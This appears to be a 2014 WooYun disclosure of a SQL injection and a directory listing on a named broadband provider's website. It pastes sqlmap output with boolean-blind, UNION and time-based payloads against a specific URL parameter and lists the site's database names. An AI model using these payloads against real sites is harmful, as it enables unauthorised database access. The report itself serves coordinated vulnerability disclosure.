当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060933

漏洞标题:某省长城宽带sql注入漏洞与遍历目录

相关厂商:长城宽带

漏洞作者: Mosuan

提交时间:2014-05-16 18:43

修复时间:2014-06-30 18:43

公开时间:2014-06-30 18:43

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-16: 细节已通知厂商并且等待厂商处理中
2014-05-21: 厂商已经确认,细节仅向厂商公开
2014-05-31: 细节向核心白帽子及相关领域专家公开
2014-06-10: 细节向普通白帽子公开
2014-06-20: 细节向实习白帽子公开
2014-06-30: 细节向公众公开

简要描述:

呵呵

详细说明:

前面的漏洞速度审核啊.......
网站

www.xmgwbn.com


1.sql注入

http://www.xmgwbn.com/job/main.php?id=36


注入地址:http://www.xmgwbn.com/job/main.php?id=36
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 21:49:26
[21:49:26] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.xmgwbn.com\session' as session file
[21:49:26] [INFO] testing connection to the target url
[21:49:27] [INFO] testing if the url is stable, wait a few seconds
[21:49:29] [INFO] url is stable
[21:49:29] [INFO] testing if GET parameter 'id' is dynamic
[21:49:30] [INFO] confirming that GET parameter 'id' is dynamic
[21:49:30] [INFO] GET parameter 'id' is dynamic
[21:49:31] [INFO] heuristic test shows that GET parameter 'id' might be injectab
le (possible DBMS: MySQL)
[21:49:31] [INFO] testing sql injection on GET parameter 'id'
[21:49:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:49:33] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable
[21:49:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[21:49:34] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:49:34] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[21:49:46] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' in
jectable
[21:49:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[21:49:47] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[21:49:51] [INFO] target url appears to have 14 columns in query
[21:49:53] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 colu
mns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] y
sqlmap identified the following injection points with a total of 18 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=36 AND 1649=1649
Type: UNION query
Title: MySQL UNION query (NULL) - 14 columns
Payload: id=36 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NU
LL, NULL, NULL, CONCAT(0x3a6571723a,0x5a4d74764f437262704d,0x3a6561743a), NULL,
NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=36 AND SLEEP(5)
---
[21:50:38] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.52, PHP 5.0.3
back-end DBMS: MySQL 5.0.11
[21:50:38] [INFO] fetching database names
available databases [7]:
[*] cjvod
[*] information_schema
[*] mysql
[*] noevil
[*] test
[*] xmgwbn
[*] xmgwbnweb
[21:50:39] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.xmgwbn.com'


2.遍历目录

http://www.xmgwbn.com/manual/


.jpg


漏洞证明:

详细说明

修复方案:

过滤,目录限制访问

版权声明:转载请注明来源 Mosuan@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-05-21 15:07

厂商回复:

最新状态:

暂无